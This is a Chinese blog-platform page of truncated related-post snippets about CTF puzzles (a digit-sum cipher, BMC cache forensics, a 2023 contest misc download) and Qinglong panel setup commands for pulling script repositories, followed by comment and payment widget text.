密码学 | CTF】云影加密
weixin_46301214的博客
05-26 1775
原理简述 ​1)通过0来分割(在CTF中出现,只能吃经验分析出来) ​2)分割后每个数相加 ​3)通过字典进行解密 字典 = { 1:'A', 2:'B', 3:'C', 4:'D', 5:'E', 6:'F', 7:'G', 8:'H', 9:'I', 10:'J', 11:'K', 12:'L', 13:'M', 14:'N', 15:'O', ...
ISCC2018Misc
weixin_30268071的博客
01-25 289
目录 0x00: 0x02:数字密文 0x03:知识就是力量 0x04:谍影重重 0x05:有趣的ISCC 0x06:不只是logo 0x08:一直猫的心思 0x09:暴力xx不可取 0x00: 第一次参...
青龙面板【常见问题报错】以及【升级方法】
@MIKE小助手
07-05 3万+
二、缺依赖 出现下列错误:执行命令: 三、缺文件 一般出现这种错误:执行命令: 四、缺py依赖 一般出现这种错误:执行命令: 五、脚本问题 遇到这种问题:操作是:原因可能是脚本问题,或者接口问题,或者是黑号,又或者是京东问题,又或者是ip黑了,等等。总之遇到这种情况,喜欢倒腾重装能解决,或者换ip再试试 七、全部依赖库 八、青龙面板修复登录次数 青龙基本指令: 使用方法: 连接SSH后输入下列指令登录容器: 需要修复的类型就输入对应的指令: 1.ql check 指令2.ql resettfa
2021年“领航MISC-《BMC》解题WP
Mark的博客
09-02 667
第一步、拿到这题我们先想到的便是取证BMChache。 此处我们利用的工具是github上一款开源的软件链接 https://github.com/ANSSI-FR/bmc-tools 第二步、将压缩出来的bmc包放到工具中进行取证 命令如下(在当前目录中将文件追溯出来): Python bmc-tools.py -s bmc -d ./ 得到图片中包含flag,进行拼凑 ...
青龙拉取faker库以及脚本去重详细教程
cbh1987的博客
09-26 2万+
一、拉取第一个仓库 # 进入容器 docker exec -it qinglong bash # 青龙升级 ql update 新手推荐Faker仓库集合,比较全面,并不断更新 #国外VPS可去掉前面的代理地址 [https://ghproxy.com/](https://ghproxy.com/https://raw.githubusercontent.com/sngxpro/QuanX/master/task/AllinOne.json) #【Faker集合仓库】 ql repo ht
青龙面板仓库推荐 以及修复拉库失败(4.24更新)
快发工作室的博客
04-27 8306
青龙面板-方舟ark搭建成品参考 http://jd.51kuaigouwu.com/ 拉库失败的 青龙配置文件config.sh GithubProxyUrl=“xxxx” xxxx是代理 (设置代理即可或去掉默认代理地址) 一般都在前三十行 找到后更改 小埋duck仓库(临时活动,开卡,有活动豆多) ql repo https://github.com/okyyds/duck.git "jd_|jx_|gua_|jddj_" "activity|backUp" "^jd[^_]|USER|funct
青龙面板拉库代码
weixin_55175182的博客
07-10 2万+
第一步 拉库 上期我们成功安装了青龙面板,现在需要拉取大佬们的脚本。 青龙拉取常用京东脚本库 新手推荐使用Faker集合仓库,集合仓库内包含本文内所有作者可用脚本,并不断更新。 FAKER整理 TG交流群 https://t.me/jdscrip 2021-7-7 16:00更新 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8191
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2023蓝帽初赛misc下载
12-04
2023蓝帽初赛misc下载是指在2023年举办的蓝帽网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽初赛misc下载是参赛选手在参加蓝帽网络安全竞赛中所需进行的一项任务。选手需要在蓝帽官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值